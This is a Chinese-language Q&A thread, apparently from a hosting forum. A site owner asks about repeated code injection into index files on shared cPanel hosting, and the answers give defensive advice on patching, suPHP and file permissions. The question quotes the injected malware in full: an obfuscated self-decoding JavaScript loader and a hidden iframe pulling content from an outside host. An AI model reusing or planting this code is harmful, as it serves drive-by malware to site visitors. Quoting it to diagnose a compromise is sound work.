最近还有人见过这种情况吗?我有几个网站因为这个错误而瘫痪了。
Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39
它是由蠕虫/注入攻击引起的,它会在它能够找到的任何 index.php / index.html 文件中随机转储以下代码:
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
该代码盲目插入一个 JavaScript 源的 iFrame:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
我曾尝试破解该网站以查看这是如何发生的,但有人知道这是什么具体的攻击以及它是如何传播的吗?是未修补的漏洞代码、CPanel 本身、破解的密码还是被 root 的服务器?
编辑
我无法准确确定这里发生了什么,但看起来这是 CPanel 的问题 - 更改 CPanel 中的所有密码似乎可以阻止重复攻击。我让一个不重要的网站处于这种状态(没有清理网站代码),它完全没问题,而之前它每天都会受到破坏。就此事联系了 UK2.net 和 JustHost,但到目前为止没有回复。
似乎 public_html 文件夹和其他一些“系统”文件夹也出现了奇怪的 chmod - 出现了许多 777 这样的错误。到目前为止,主机方仍未对此做出回应。
编辑
似乎是“Trojan.JS.Agent.bur”尝试了解更多信息...
答案1
听起来您的网站已经成为蠕虫的受害者,该蠕虫正在将 HTML/代码注入您的文件中。下次发布相关代码,以便对其进行分析。与此同时,您应该确保您的所有应用程序和系统库都已安装最新的安全补丁。
答案2
您正在运行共享托管环境,还是您是客户?
可能发生的情况是,服务器以同一个用户身份运行每个用户的代码(可能是“apache”或“httpd”)。然后,只需要一个易受攻击的脚本任何客户在机器上,每个人基本上都被黑客入侵了。
如果您不是此服务器的操作员,您能做的很少。您可以尝试将所有内容都 chomodding 为 755,并确保所有内容的所有者是您的用户,而不是“apache”或“nobody”。但是,这只能阻止您的文件被修改。攻击者仍然有可能读取您的所有文件(例如,您的数据库凭据)。除非您可以说服您的主机更改为 suPHP 或类似主机,否则我强烈建议尽快寻找另一台主机。
如果您是主机,请重建 apache(使用 easyapache),并启用 suPHP 选项。然后您需要将每个用户的文件 chown 设置为由其自己的用户所有,然后 chmod 755。suPHP 将以每个用户自己的用户身份运行每个用户的代码,这将防止此类攻击。
答案3
它要么是通过 SQL 注入被注入到您网站的数据库中,要么是通过在线文件管理器上传/利用的。我见过这种情况发生过很多次,通常当它存在于所有文件中时,它是通过基于 Web 的文件管理器执行的。
不用说,由于您还没有收到主人的回复,我会开始寻找一家新公司。
您很可能只能进行手动清理,除非他们(您也同意)恢复最近的干净副本。鉴于他们的响应速度缓慢,我仍会考虑换一家公司。